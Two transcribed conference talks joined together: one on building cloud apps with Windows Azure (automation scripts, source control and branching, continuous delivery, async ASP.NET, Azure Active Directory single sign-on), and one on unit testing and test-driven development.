Okay. Silent 2. So we're going to create another app. It's a simple, low world app here. And what I'm going to do is inside this Silent 2 app, is I'm going to go ahead here and create simple project, or simple folder, I'm going to call Automation. So it's underneath right next to my solution. And I'm going to paste in a couple of simple little PowerShell scripts. And I'm going to post these later so you can go ahead and download them and use them yourself. And we'll walk through exactly what this thing is doing in just a second. So we'll go ahead and actually first let's kick it off. And what these PowerShell scripts are going to do here, so you can see Silent 2, and I have a little PowerShell window here, is one of them is called Create Azure Website Environment. And we'll call this the Silent 2, so NDC Silent 2 environment. I can choose where I want to deploy it in the world. So I do East to West to West to West. And I'm going to specify a SQL database password to use as start. And basically this is going to kick off in an automated way, provisioning for me in overall environment. Let's look at what the code is here while it's doing it. It's going to take about 70 seconds. And what I'm going to do here is just add a solution folder called Automation to my project. I'm going to add to this some existing items, which are those scripts, so that they can be part of my environment and they can actually be checked into my source control system, which we'll talk about in just a second. And what this script does, Simple PowerShell script, basically takes a bunch of parameters or just some defaults, and what it basically does is you can see I turn on verbose. We'll see if it's running here. And it's saying something about the network not being available. I pretended that work. And you can basically see here sort of a set of automation scripts where it's creating a path. It's going to automate for me, creating this website. And so it's using a command called New Azure Website, where I basically pass in the location and the thing there. This is how I can go ahead and create a SQL server. And you'll notice here one of the things I'm doing is actually retrieving my IP address and setting a firewall rule so that my dev machine can actually connect to it. And then what I do is I create what's called a storage account, which I'm going to be able to use for blobs and queues, which we'll walk through a little bit later. And I'm also then configuring as part of my app settings a number of pre-built settings on the solution here. So these are going to override my web.config files. And you'll notice here I'm passing in my SQL database and my storage details. I'm also enabling what's called the CLR profiler and setting up a new relic package so that we can actually do monitoring and diagnostics and telemetry. And then I embed my connection strings as part of this environment as well. And then when it's done, I just restart the web server we just created, output a bunch of stuff, and then basically just tell how long it took to actually run it. And you can see here, let's see if it's actually complete or whether or not it retried. But you can basically see what we did here is it went ahead and created for me all of this kind of environment. And if I go into the portal now, what I will see is a bunch of stuff that was created. So you can see I have my NDC Silent 2 website, which is what we just programmed. It's now running. I didn't have to click anything in the portal. I have a SQL database and somewhere inside here is the database I just created. And I also then have my storage account somewhere inside here as well that we just automated. And the beauty about this is I can effectively automate everything. It took about 90 seconds to create this environment. And every time now anyone on my team wants to create a test environment, they can basically just run the script and know that the exact same environment that I'm using on my dev machine they now have access to as well in their own environment. If I want to on my test servers or my production environment, I say, oh, we got a bad fix. We got to get this thing out quickly. I can go ahead and run this script. And in 90 seconds stand up a completely cloned environment of what my production system looks like that I can deploy bits into and go ahead and run. And the same way that I can go ahead and create this environment, I can also run a little script called deploy. And what this does is, and most of it is verbose because I'm just trying to output what's happening. But basically it's going to do a build on my solution on the command line and then effectively it just kicks off a deployment and deploys it into that web server environment that we just created. So you can see basically in only about 40 lines of PowerShell, most of it comments and logging statements, I can automate both the creation of my site and the deployment of it. And every time I deploy now, I can just go ahead and just say deploy from the command line. And I know that all the steps will happen always the same way in the same order in a completely automated way. And then I can now deploy as much as I want into the cloud environment and not have to worry about missing something or screwing something up or doing something custom on my machine that won't actually work in someone else's or in my production environment. So I'll post these scripts, you can run them yourself. But again, everything I'm going to show throughout the talk here and everything inside Windows Azure, we basically have an API, both as a REST API, a PowerShell script and a command line bash utility that you can run on Linux or Mac in order to automate everything. And so definitely we're checking out once you actually get beyond kind of the early basics of Azure and figure out how you kind of apply in your environment. So pattern two I'm going to talk about is source control. I was talking to someone about the talk and I said, you know, we're going to basically walk through patterns you should use when you use source control. And he said, well, what happens if you don't use source control? And I said, well, okay, the first pattern, sub-pattern is use it. And then here's a couple other things to talk about specifically in terms of how you use it. You know, definitely do recommend using source control for pretty much anything. But especially in the cloud where you're changing things a lot and where you want to be able to react very quickly to issues that are being reported by your customers, source control is really essential. And it's essential not just for your code, but the other thing you really want to make sure you do in any type of services world is take those check-ins, you know, all those automation scripts that I just showed you and version them as part of your actual application solution along with your database scripts and pretty much everything necessary in order to run or scale your environment. So having checked in together with the code, that way when you actually iterate the code, you're changing the automation scripts at the same time. And if you ever need to roll back or you need to make a quick fix, you can sync the code and know that this set of code matches these set of scripts and that everyone on my team is using them. And we can use them in a very agile, repeatable way. And without having to spend lots of time trying to chase down which scripts or did Joe change this setting? He mentioned this, but he's not available. He's on vacation. You got to really make sure that you have everything in one place and it's totally repeatable. A couple other things just to make clear. Don't check in your secrets. Don't check in your passwords. Don't check in specific locations in your scripts. It's much better to actually, not just much better, you should always parameterize your scripts and store your secrets somewhere else. And also as you're kind of designing your source tree, think hard about what kind of branches you want to have and make sure that you optimize it for what I call a DevOps workflow. So what do I mean by that? There's lots of different ways that you can do branching on your projects or set up your source tree. This is kind of a pattern that we see a lot of kind of medium sized teams use where they basically have effectively a master branch. And this basically always maps to the code that's live in production. And so that way if you're ever having an issue with the live app that's running in the cloud, you can always very quickly switch to that branch, look at the code, look at the automation scripts and know that this is always the central source of truth to whatever is deployed and running that your customers is hitting. What we often then see is people actually set up branches underneath that to map to the different life cycles that they're developing. And often what they'll do is they'll have a development branch, which is where the development team checks into and integrates features. If it's a big team, you might have feature branches underneath. If it's a smaller team or you want to make sure that you're iterating and integrating often, you might just sort of stop at the development branch and have everyone check into that. But it scales if you have a couple people that are working on something that's going to take a week, you can just create a sub branch of development and then push it up through it. And then what we often recommend and often see people do is have a staging branch somewhere in between master and development that you use as kind of effectively your final integration testing or final testing before you go live in production. And so you can use different branch strategies, but one of these, you know, the nice thing about this type of approach, and for a small team, you could just have master and development. You don't need to have all these different branches. But the nice thing about this is it gives you a very agile way that you can flow your code from your dev machine into production in a kind of, again, a repeatable way. The other nice thing about having multiple branches is, again, it makes it much easier and having your master or you could have a sub branch called production if you want to snap it, always available, is that it enables you to kind of very quickly, again, react and make changes in an agile way. So if there's a live issue hitting production right now and you need to make a quick fix, you can just go ahead and create a sub branch off of staging or I guess even off of master. Make your hot fix, check it in, and then get it deployed. And you don't have to worry about having a bunch of features that in theory are all done but you're not a thousand percent sure that you're going to try to snap that hot fix into. This again allows you to kind of move off of the live production code, make a very small surgical fix, get it live as quickly as possible, and not have to spend a lot of time integrating and testing things that haven't hit production yet if it's an emergency. This type of model where you have multiple branches, you're working in different branches and you want to sometimes create new branches on the fly. You can use it with any source environment. Sometimes distributed based source control systems work best because you can quickly kind of move between these and they also kind of work great in kind of a distributed team environment. How many people here are using some kind of DVCS solution, either get or mercurial? Great. You can do all the same techniques I'm showing as well with TFS. We actually have teams within the Azure group, some that use centralized TFS, some of which use Git. We use both of them ourselves. Both work perfectly well in this type of environment. One thing that I've actually been playing with, and you'll see kind of be integrated even more going forward inside Visual Studio and with our team foundation service and server, is Git support. One of the things we announced earlier this year is we're kind of adding first class Git support in Visual Studio. For people that haven't tried that before, we'll just go back to our Silent 2 project here. If you want to use Git, you can now go ahead and just say add solution to source control. You can go ahead and say I want to check it in using either TFS source control, which is centralized or Git. What this will do is basically it's using the same Git command line tool in lib.lyb.git2. Oh my God, that's wrong, that you'd use elsewhere. What this has now done is basically added my project to source control using Git. I can go ahead and do a commit. I could say, if I wanted to, I could say initial check in, do a quick commit. Basically I just went ahead and checked in code. If I make a change, if I change this to say something else, I could do that. I can highlight what's changed. One of the things that's kind of nice is there's full diffing support with the VS tools. You can forget here. I can actually see the changes that I'm making and easily check them in. The nice thing about this also is if I want to ever make a branch, I could basically do that in an easy way. Let's say I realize, oh my gosh, we've got a bad problem that we need to fix. I could go ahead and create a new branch that I want to work with. I could very easily make a change to it. Create a new branch, we'll call this hotfix1. I now have a hotfix. I can go ahead and say this text should be different. Quickly go ahead and check this in. One of the things that's nice is as I switch between the branches, you'll notice here my code and my solution explorer will automatically change as well. It's a simple example of how quickly I can create a branch, work on something, flip back and forth between my development and my master, make a change, go ahead, use the automation scripts that are all checked in as part of my source control in order to push a live update or create an environment in order to do that testing in a very kind of agile way. This isn't the only way you can do it. You can use material, you can use TFS, you can write your scripts in whatever approach you want, but having these types of tools available are going to make you very repeatable, very agile, be able to respond quickly and have a lot of flexibility. If you ultimately want to check this in to kind of a team environment, the Git tools that we shipped inside VS do allow you to point to a Git repo, you can go to GitHub. One of the things that we're doing is actually now support as part of the team foundation service that we run and will ultimately ship as part of TFS server as well is adding Git repo support to that so that you can still use all the same TFS capabilities in terms of project and work item and bug tracking, but integrate Git as part of that as well. Some things to think about in terms of source control, but again the key things here are check in your scripts as part of your solution, parameterize everything, don't check in your secrets and then think hard about your branching strategy and really measure yourself on how quickly can you go ahead and make a change, get it live in a very safe, predictable way. Anytime that you think, gosh, I'm scared to make this change or we need to spend a day or two just doing kind of manual testing on it, pause and ask yourselves what do we need to do process wise, what do we need to do test wise in order to make it so that we could make that change in minutes or at least within an hour and do it in a very fast way that you feel comfortable with. Last sort of process thing I'll talk about before we dive into more code is another pattern here continuous integration and continuous delivery that people have probably heard the buzzword around. How many people are using a CI solution? How many people know that they should be using a CI solution? Okay. How many people are doing continuous delivery? That's a little bit more kind of new. Cool. The number of people you're doing here. How many people have no idea what I'm talking about? Okay. You're being, you're not being brave enough. I'm sure someone here is wondering what in the heck is continuous integration delivery? Well, at a high level the nice thing about continuous integration delivery done right is it enables a deployment pipeline so that you can integrate with your source trees, you can integrate with your automation environment and enable it so that every time someone does a check in, you can in a repeatable automated way go ahead and do a build, run your test against it and with continuous delivery you can go one step further and actually take those automation scripts and actually deploy it either by having someone push a button or even a completely manual or completely automated way as soon as the build tests pass into an environment that you can actually do more in depth testing with. And hopefully what you've seen with the automation that I've shown is automating everything inside Azure is really easy. Because it's running in the cloud, you're not having to build servers in order to actually or buy servers in order to actually do that. And the beauty about integrating the cloud with a continuous integration or delivery environment is you can now basically instead of having to wait for a server to be available to do your testing on, you can actually on every build that you do go ahead and actually spin up a test environment inside Azure, run acceptance tests or more in depth tests against it, then when you're done just tear it down. And if you only ran that server for say two hours or ten hours or a day, the amount of money that you actually would need to spend in order to pay for that because you're only paying for what you're using, you're only paying for the hours that that machine is actually running. And I can't do the conversion in my head. But in general, like a website, the website environment that I'm running right now basically costs one US cent per hour effectively. Actually, the one I just deployed will be free. But if I go to tear up, it's 1.6 cents per hour, which I don't know what it translates into in origin currency, but it's not much. And basically, it's less than, if you ran this for a month and you ran the environment effectively for only an hour at a time, it would probably cost less than a latte that you bought at Starbucks in order to actually have that environment used for your kind of environment. So it ends up being very cost effective, fully automated. And again, if you haven't used continuous integration and delivery before, it's definitely worth checking out. And generally what I recommend going back from the branching strategies is have at least your development and your staging environments be automated from a deployment perspective. So every time you check in, if your build tests pass, deploy it into some environment. Then you can run your full acceptance test, or you can have people on the team go ahead and check. If you want to be really bold, you could say every time we actually integrate into the master branch, also automatically deploy the live production site. That's kind of the nirvana that everyone knows that they should aspire towards. I'll be candid, most teams don't do that even within Microsoft. Just because sometimes it's nice to have some human being just sort of say, yep, we really want to push it live in the middle of the afternoon versus, well, let's actually wait until early morning or some point where all the dev team is available for us to go live. So often people will have a last minute manual check or at least push the OK button before it goes live in production. But there's nothing that can prevent you from actually having your entire dev environment and your entire test environment be completely automated so that all the developer needs to do is effectively just push their source into the main tree or in one of the branches in the main tree. And you can basically build it, run your unit tests, deploy it, run your acceptance tests, completely automated, and have as many developers on the team going ahead and doing that 24.7, very, very cost effectively. There's lots of solutions you can do to enable this. There's a bunch of great talks throughout the conference about integration and delivery. I can't do justice here, but hopefully I just wet your appetite. One thing that we're also working on ourselves, so there's things like TeamCity and other, Hudson and other environments that you can use in order to do CI and CD. One of the things though that we're also working on is part of our team foundation service, which is free up to five people, and you can sign up and actually play with it today, is actually trying to make it really great to do this type of continuous integration and continuous delivery without you having to set up anything. So it runs as a service, it actually runs on Azure, it supports both Git and TFS, and it now has an elastic build service so that you don't actually have to have build servers lying around. Instead, every time you push your code in, it can automatically kick off a build using servers that we maintain, and we don't charge you as long as you do a certain number of builds, then you can have reserved build servers if you want to pay a little extra. And we basically do continuous integration, we can deploy to Azure. They also just recently added load testing support, so once it's actually in an environment, you could start throwing load at it in order to measure performance and stability, and they just recently added some team room collaboration and some more agile project management capability. So if you're looking for kind of a turnkey solution, that's one you can also go ahead and look at. So now we talked a little bit of process, let's now drill in more into code, and I'm going to walk through a couple of best practices here, both on the website as well as with enterprise integration and then data throughout the rest of this talk. So let's start with web. How many of you here are doing web development or building apps? Great. A lot of these best practices apply both for web as well as for custom mobile back ends if you're using, say, ASP.NET web API, you can apply these as well. And at a high level, some of these ones that I kind of listed here from a best practice perspective that I kind of recommend, the first two kind of just are pretty obvious and then we'll drill into some of the more detailed ones a little bit later. But one is, you know, wherever possible, be stateless on your web tier. In other words, try not to use session state, try not to have anything that needs to be stored in the web server in a stateful way. Try to have it be as stateless as possible. There's a couple of reasons for that. One is if it's stateless and you put those machines behind a load balancer, it makes it really easy for you to go ahead and just keep adding machines as you need capacity. And it also makes it really easy for you to shrink machines or turn off machines as you don't need capacity. In an environment where you're only paying for what you use, that ability not only to expand but also to shrink your capacity based on load translates into huge savings. It also makes it architecturally much simpler to scale out your solution. So if possible, avoid session state since that does add some state. If you do need to use session state, don't store it in a database. We have a nice cache provider that you can use on Azure that we recommend instead. And that actually scales out and is much more cost effective and much better. Recommend using a CDN. For people who don't know what a CDN is, it's a content delivery network. This basically allows you to edge cache your JavaScript as well as your images so that if your customers are accessing your website, they don't always have to hit your web server. Instead, they can hit a cache location somewhere closer to them. In particular, if you are reaching a broad audience, that can help and just speeds up the overall load time of the site. And then this last one is something that, I'm curious to see how many people here are using the.NET 4.5 async support. People know that there's async support. Cool. It's really cool. Definitely recommend using it, both for your on-premise, this is based applications. So if you're running existing Windows servers inside your organization, but especially also in the cloud. And it allows you to kind of avoid making any blocking calls within your solution and really enables you to scale out in a much richer way. So for people that haven't seen it or they've heard about it, this is sort of a simple example and we'll walk through this fix it code in just a second of where I'm using async and some of the benefits that it provides. So basically you can see now with the latest version of ASP.NBC, web API and web forms, we have full async support. You can effectively just go ahead and mark a method as async. Then you typically return a task of T. And then I can go ahead and every time I make a call to an async API, I can effectively say await on it. And what this does under the covers is the compiler will then automatically generate the appropriate async code so that as I'm waiting for this fix it repository fine task by ID async method to go hit the database, ASP.net can unwind the worker thread and use that thread to process another request. And the benefit there is instead of, you know, let's say the server has 10 worker threads, instead of having a lot of them blocked waiting on database calls or remote network calls, it can process a lot more requests much more efficiently. And you could do this in the past even with ASP.net one because it did have async APIs, but it was frankly kind of a nightmare to write that code and very error prone because you had to write a lot of async code in order to handle all the error conditions. What we've done in.net four or five has made it really easy. So just directly within C sharp or VB, you can use these keywords in order to express the same intent and really scale out your app in a great way. A lot of people, you know, often talk about Node.js as an async based way in order to build server apps. We support Node.js also in Azure. The nice thing about the async support that we now have inside.net is we do all the same things. We provide all that same capability. But I think from an API perspective, especially if you're coming from more of a procedural background, it's a little bit cleaner. You get full intelligence and full debugging. And then the benefit is the actual code that's running is also running through the standard CLR Just-in-Time Compiler. So you're running very, very optimized code on the server so that when your code is running, it's actually going to be much faster than, say, an interpretive environment. One thing that's cool that I'm taking advantage of in this app is we shipped as part of web forms, MBC and Web API async support for the web server, but our data libraries didn't support it yet. You could call web services, you could call sockets or do file system IO async. But the most common pattern for most people building web apps is to hit a database of some shape or form. We're adding into entity framework six async support. And this is now available in preview. And the final release will be out in a few months. And what this means now is in my fixit repository class that I've defined here, you'll notice that I'm able to access an entity framework context. This is just a standard code first database context. I can then have my repository classes also be async. And then I can go ahead and call now my database and insert and retrieve things in a completely async way. And this now means both my data access library and my web tier can unwind the worker threads and run code in a super efficient way. But anytime I hit my database, I'm not blocking and I can actually return things again in scale much better. And what's cool is this works not just for simple finders or inserts and deletes. It actually composes with link queries as well. And so this is an example inside the code we'll walk through in just a second where I'm actually writing a complex link query and using where clause is in order buys. And what you'll notice here is this whole method is async so that this whole complex query is going to be passed to the SQL database. The thread gets reused for another request. When the SQL database returns it, we can re-queue the thread, continue execution from the exact same place logically in the code that it left off and continue running. And now you can basically not block ever on the server and have an app that will scale better than pretty much any framework out there on the server in a really clean way using the C-sharp or VB or other.NET language that you already know. So I'm using this heavily within the application and we'll walk that code in just a second. Other things here in terms of what I'm using inside this web app just to kind of explain some basics. I'm taking advantage of a feature here of Azure we call websites. This is basically a way that you can go ahead and host a web app inside Azure without having to host and run your own virtual machine in order to do it. And so we actually provide all of the mechanisms necessary to basically run that website inside Azure and we'll do the hosting and the scale out and the recovery for you automatically. It works with ASP.NET, it works with Node.js, PHP and Python and it enables you to kind of very quickly deploy in seconds. And so you can make changes and quickly refresh them usually in a matter of less than 10 seconds from the point you hit deploy to the point that it's live in production. Now what's great is you can deploy on a free environment and then scale up as you need to. And basically the way this works, it's simple. You saw me earlier create the website and then just deploy to it. Under the covers behind the scenes, it's kind of a complex environment. It's really kind of building and providing for you a lot of features that if you're using purely a virtual machine in order to set up and manage IAS, you'd actually have to build yourself. And this diagram here on the right is sort of an example of what this environment looks like. Basically when you show up and you say I want to run this website, you can choose how many machines you want to run it on. So I can say I want to run on one virtual machine or I want to run on two virtual machines. And it'll basically stand it up and create it for you. And then what the service, the website Azure services also doing is provides a deployment endpoint so that when you say I want to deploy my app, whether it's through VS or whether it's through an automation script, it'll automatically deploy onto those machines the bits that you actually go ahead and produce. And so it does all of the laying down the bits, setting them up, making sure IAS is ready in order to use them. And then when a customer shows up and types in the URL, they hit those machines. Now the cool thing also about the website services, they don't hit the virtual machine directly. The Windows Azure website runs a pool of what we call load balancers that are using a level layer seven application request router load balancer, which again you can run yourself. But the beauty is it's set up for you automatically and they'll route that request to the appropriate machine. If a lot of requests come in at the same time, they'll automatically route them to all the different virtual machines and it uses a fairly smart heuristic so that it sends requests both based on affinity as well as based on actual the queue depth inside IAS as well as the CPU on the virtual machine. And so basically we can be very smart in terms of the load traffic that's actually distributed and all that's built in. And then the other thing that's nice about it is if a virtual machine goes down, it'll automatically pull it from the rotation so no more traffic goes to it, spin up a new instance and then automatically start directing traffic to it. And so all this kind of mechanics happen behind the scenes, all you need to do is basically just say create me a website in one line of PowerShell or just go in the portal and create site and you get to take advantage of all this. And that's what we're doing within the app. So let's walk through the code and look at this real quick. So basically this is my fix it app here and you can see it's just a standard web project. I can run it. I've got a logging library and a data access library that we'll look at. And so when I hit control at five here you can see this is running in my local dev environment so I can do everything offline if I want to. In terms of kind of how it's implemented it's using ASP.NET NBC. So let's just go back here and we'll look at logging and other things in part two. But you can see basically I've got controllers. I got a home controller, a task controller and a dashboard. The dashboard is gives me kind of crud support. And again you can see pretty standard action methods that are exposed here. They're all doing async. And so you can kind of see a simple example here where I have details get passed in. It calls a repository, returns hp.found. If it didn't find it or basically just renders the content there. One thing you'll notice is I'm passing in as a constructor argument to all of my repositories and all of my controllers a few parameters. So my controllers all get an itask repository. And if you go and look at the repository you'll see it gets passed in a logger interface that it uses as it's doing its data access. And basically what I'm taking advantage of is dependency injection. And specifically the auto fact dependency library. And so there's a couple different ways you could do dependency injection. This is a nice framework so instead of me manually passing in these things what I did inside this code is take advantage of auto fact. And all I need to do is say every time you see an I fix it task repository in a controller or an I logger or an I photo service just pass in this specific instance into it. And so basically in just sort of these six lines of code I can now very cleanly inside any of my classes that I use inside my framework just go ahead and get my dependencies passed in. Makes it a lot easier for me to go ahead and test. And that basically ends up being kind of my data library kind of a nutshell. And again it's running inside Azure. So if I go ahead and click on this. This is a Europe instance here. I can drill into this particular app inside Azure. And you'll notice built into Azure is a dashboard so I can see how many requests that was probably from last night and that was when I was running it just a few minutes ago that I actually hit on it. If I want to scale it I can click the scale tab or again I can set a power shell command so everything I'm doing here I can also go ahead and run. And if I wanted to say hey let's deploy this on six medium sized virtual machines all you need to do is hit save and it will auto scale now this app in a matter of about 10 seconds to five more virtual machines that are each about three and a half gigs of RAM and my app is now running on it. So basically it was just a few commands or through the portal I can very easily deploy this app and then scale it up or scale it down. And that whole environment that I walk through where I have load balancers automatically in front of it I'm doing automatic protection in case that app ever goes down and I'm running it in a completely async way all just works. So you can do this pretty much with any ASP.NET app and take advantage of it really easily. One last thing I'll just mention real quick is if you click the configure tab you'll notice here a bunch of app settings and connection strings that are available and this is basically a way when I ran that script up front one of the things I briefly touched on is how you can go ahead and script these as part of the environment. So when I created this environment as an example here I basically specified that I want to use these settings. Some of them are never changing a few of them like my storage account name are dynamically created elsewhere in the script and passed in as arguments. One nice thing about this model here is it allows me as a developer I can basically have dev settings inside my web.config file that I use. So I just do app settings or get connection string from my config file and then at runtime this allows me to override the settings that are in the web.config file with production based environment. So you'll notice here from my dev environment here I have a local DB data source checked into my web.config and so all the developers will just use a local database on the machine as they're doing development. And then at runtime when I create my environment in an automated way that script created a database for me and it automatically set a production connection string on that web server and now when my app runs in this environment it will automatically connect to the production database instead of my local DB. And so this provides a really nice way that you can override in an automated way and it makes it really easy so you're not checking in secrets into your source code so you don't actually have to modify the web.config as part of your build process. Instead you can use this app settings and connection strings model to basically override these values at runtime and have only a set of approved folks know what the production settings actually are. So again the scripts will show you how to do that. So we talked about some web things, let's now talk about security and then we'll talk about data. And so what I want to talk a little bit about is this pattern here which is single sign on. And one question people often ask me is okay I'm building primarily apps for the employees within my company, how do I host it in the cloud and still allow them to use the same security model that they already know and use in their on-premises environment when they hit my app that's running inside the firewall. And one of the ways that we're kind of doing to enable this and you'll see some announcements come out in the next couple weeks is through something we call Windows Azure Active Directory. And this is basically providing Active Directory in the cloud. It integrates with an on-premises environment, enables single sign on within all your apps and it does it in a way that's open standard. So I can use SAML, I can use OAuth and I can use OAuth 2 in order to connect to it and integrate within my applications. And the beauty is we're making it really easy in order to actually set up. And so you can kind of just build a diagram here. Imagine you have an on-premises Windows server environment where you're using Active Directory to have your employees sign on. And so you kind of make this work just like today. What we're allowing you to do with Azure is create a directory in the cloud and it's a free feature so you can do it without having to pay anything. And that directory can be used also to sign on. And you can have that directory only have basically be disconnected so you can put anyone you want into it. Or the cool thing is you can connect it to your on-premises Active Directory at which point all of the users that could log on on-premise can now also authenticate using Azure without you having to open up a firewall, without you having to actually deploy any custom new servers. You can leverage all the existing Active Directory environment that you know and use today. And at that point then your mobile devices and your web apps can authenticate in the cloud and you could basically have your app that you hosted in the cloud, including your enterprise internal-facing apps, now have enterprise single sign on. You can also use this for third-party apps. So for example, if you're using Salesforce.com or Google Apps or Office 365, you can use this directory in the cloud in order to enable single sign on with them as well, all in a secure way. And the beauty is anytime a new user gets created into your organization or anytime a password changes, they just use the same mechanism they use today on-premise and it will automatically flow and apply immediately in the cloud as well. So it makes it very secure. Doing this is pretty easy. Again, you can do it through PowerShell. I'm going to do it through the portal just to kind of illustrate the concepts. Basically you just go inside Azure, you click on Active Directory. If you don't already have a directory, there's a little button here called Create One. Right now you can only create one directory and you can't delete it. So think carefully about what you name it. I named it Scott Guthrie, which is actually very confusing because Scott Guthrie is now both a directory as well as a user. The ability to create multiple directories is coming, but right now it's only one per account. And basically, within this directory, I can add users. So we basically have full support for creating and managing users within this environment. So if I wanted to, I could go ahead and create Tom and add this and I can give username last names, pick the roles, and it will go ahead and create a new account for them in the system. And once I do that, then they can go ahead and log in using this cloud directory. What's cool of those, I can also click this directory integration tab. And if I enable this and then download a tool that there's a link for, I can also then sync my existing on-premises active directory that I'm already using inside my organization with this cloud, at which point all the users in my organization will show up in this directory as well. And at that point, then, I now have a lot more users and I can do single sign-on within all my apps in order to integrate them. And doing this is really easy. We just shipped a tool actually last week that you can download. Again, it's a free tool and the Windows Azure Active Directory itself is free to anyone. You download the tool, you click Next, you enter in your Azure account details, you click Next, you enter in a domain user account that's on your corporate network. So this is your existing on-premise network. You click Next, you click this enable password sync if you want to go ahead and hash your passwords and store a hash version in the clouds. We never know what your passwords are. It's a one-way hash. Alternatively, if you never want to send any passwords, including hashes, you can also use ADFS and set it up. So a few extra steps there, but that also allows you to use the cloud directory as well. But for this simple model, just go ahead and click the hash. Click Wait a few minutes and you're done. And at that point, then, if you run this on a domain controller, just one domain controller inside your organization, it can be Windows Server 2003 or higher. All your users are basically in the cloud and you can now do single sign-on from within any web or mobile application. Again, using SAML, OAuth, or WSFed as an API head. This makes it really easy in order to actually integrate enterprise security in this model. So let's go ahead and walk through how you do that. It's really simple. Basically, you can go now into the portal and you can create an application. Again, you can also do this through the command line. And all you need to do is just say, what's the app I want to run? So I can call it fixit web 2. I can enable single sign-on. I can also give directory access so you could read or write properties in the directory on users so you could see what their phone number is, whether they're in the office when they last logged on, in a kind of graph REST API way. So if you're ever familiar with Facebook, think of this as like an enterprise Facebook graph where I can just say, just do sign-on. And all I need to do then is basically paste in the URL of where my app is deployed and I give it effectively a URI secret that embeds as part of it. And then you hit OK. And at that point, I can have any number of apps deployed. This is the one that I have inside North Europe. And basically, I just paste in this key into my web.config file. And this works for any app in the tenant so you don't have to configure it. And at that point, what I can do inside the new version of ASP.net that's coming out in about a week and a half. So now, let's go ahead and do that in room numberconf
|
This two part talk will explore how to build real world cloud applications using Windows Azure. The talk will cover key patterns of cloud computing including: - Automating Everything, - Source Control Best Practices, - Continuous Integration/Delivery, - Enterprise Identity and SSO Integration, - Web Development Best Practices, - Data Storage Options We’ll discuss each of the above cloud patterns in the talk, and then demonstrate how to really use them by walking through real code that shows how to leverage them within a Windows Azure application.
|
10.5446/51508 (DOI)
|
Thank you. We just finished talking about the importance of unit tests. I haven't talked about TDD or anything else because I want to get across the idea that unit tests by themselves are worthwhile, independent of whether you're using TDD or something like that. That becomes important because if you have legacy code and it doesn't have unit tests, it's not too late to add those unit tests or to start introducing unit tests. You don't have to use some other fancy methodology. The next thing I want to talk about is automated unit testing. Automated unit tests are those that are run automatically, usually inside a testing framework that will check to make sure that they have succeeded or they have failed. It makes unit tests a lot more useful because you get to run them very frequently, ideally after any non-trivial code change, which hooks into the idea that you want to make sure that they can be run very, very quickly with almost no overhead. I mentioned this once before, but it bears repeating that unit tests are software and as such they need to be maintained. They're not just temporary scaffolding. What this means is they have to be kept up to date with the code that they test. They should be made up of good code, which is readable, which is maintainable. Remember, one of the roles of unit tests is to serve as documentation for interface clients. That's another reason why they need to be really nice to look at. Now I want to talk a little bit about test-driven development. I'm going to assume, well, let me ask, how many people are familiar with the basics of test-driven development? As expected, especially at a conference like this, pretty much everybody. You already know the basics. Fundamentally, test-driven development means what you do is you write a test for functionality before you implement it. This is also called test-first programming. Then we've got a TDD loop that you execute to improve the functionality of the system. You write a small test for the new functionality. You confirm that the test fails to make sure that the test is actually part of the test is being executed, so you want it to fail right away. You write enough code for the new functionality to pass the test. Now you know you have the new functionality that you wanted. You then refactor to get rid of any code smells because while you were in step three, you wrote just enough code to get the new functionality to work. Now you're going to clean it up in step four. Now that you've cleaned it up, you run the test, excuse me, now you're going to refactor to get the code smells out in step five, and then you're going to reconfirm that the system still passes all of the tests. That's the basic TDD loop. This essentially elaborates on what I just told you, but since most people here are familiar with TDD, I'm not going to go through this in great detail. Basically these are again the steps along with their motivation. What makes TDD work is it relies on automated test execution. This is usually in some kind of test execution framework. Almost all the frameworks at some level, they mimic the original ones, which was JUnit. Basically the idea is that as you're running tests, usually you've got a green bar, and as long as the bar stays green, that means you're passing all the tests, which is good. If any of your tests fail, then the bar turns red, and that indicates that at least one of your tests failed, and there's usually information below to tell you exactly which tests failed. People doing TDD often talk about red-green refactor, which means first you write a test before you've written the code that will make it succeed, and then you run the test. The test is supposed to fail. That's to make sure you really are running the test. A lot of people have thought that their systems were passing all the tests, only to discover they weren't actually executing the tests. That gives you the red bar. Then you write the code to make it succeed. Then you get a green bar, ideally, to show that you are now passing all of your tests, and then you refactor and rerun the tests. There are a lot of benefits of TDD, which I want to summarize for you, because I do think that they're important, and these are benefits that are separate from just using unit tests. First it addresses both external and internal quality, because you are making sure that you do provide the functionality the interface promises. That's external quality, but an express part of the methodology is to refactor to eliminate code smells. That is internal quality. What I like about the methodology is it addresses both aspects of code quality. Defects are detected sooner than they otherwise would be in many cases. You can find problems in the specification because it's really hard to write tests for what's not well specified. Remember, you write the tests before you write the code. If you don't know what the test is supposed to do, then you get to go back and have the specification become clarified. If you find a problem in the code, if you get a red bar, you know it immediately. In practice, this means that TDD programmers tend to spend a lot less time debugging. If you get a red bar, it has to be because of some change you just made. If you're working in small increments, then you didn't change very much most recently. Most people don't even bother to fire up a debugger. They just go back and look at the most recent code change that they made. Another thing I like a lot, interfaces are created before implementations. This I just think is great. The interface that you have to a function or the interface you have to a class is going to be determined by the person writing the test case rather than by the person who's doing the implementation. The test person is going to want to have the clearest, most straightforward interface that they can imagine. You tend to get better interfaces this way. On the other hand, if you have the person implementing the function determining the interface, they're going to try to produce an interface that is going to be easy to implement, which may not be an interface that is easy to use correctly and hard to use incorrectly. Another good thing of TDD is that code reuse is facilitated. This is what we know. We know that any time you write code, if you want to use it in a different context, that's a huge amount of work. Almost always going from one user to two users is a hard amount of work because you didn't really understand how to make it general enough to be usable in multiple contexts. But going from two clients to three clients is typically a lot easier because you've already done some necessary generalization. Well, with TDD, the code is born with two clients, the original application and the test code. So you've already got to the first two clients, which means using it in new contexts should be relatively easy. Another advantage is that gold plating is discouraged. Fundamentally, developers are less likely to add a lot of unnecessary functionality to the system if they know they have to write unit tests to confirm that it passes all the time. So it discourages people from doing a lot of work that doesn't otherwise need to be done. Now using TDD means that we are asking developers to be active in some kind of a test role. It is important to recognize that most developers are better programmers than their testers. These are separate skills. The developers are not necessarily the same people as good testers and vice versa. For example, a lot of developers don't use code coverage tools and they don't use metrics and there's been a lot of empirical evidence that shows that if you say to a developer, okay, you've written some tests, what percentage of your code do you think it covers? They'll go, ah, I'm covering 80%, 90% of my code for sure. It's covering 22% of their code, something like that. Remember I said earlier, programmers are optimists, which you kind of have to be a programmer. Really it's a miracle anything ever works. If you think of all the things that can go wrong. I mentioned this morning, programmers tend to focus on clean tests. Clean tests, these are positive tests. They exercise normal functionality. I gave the appropriate inputs. I checked to make sure I've got the proper output. Those are clean tests. Now, dirty tests, those are negative tests. 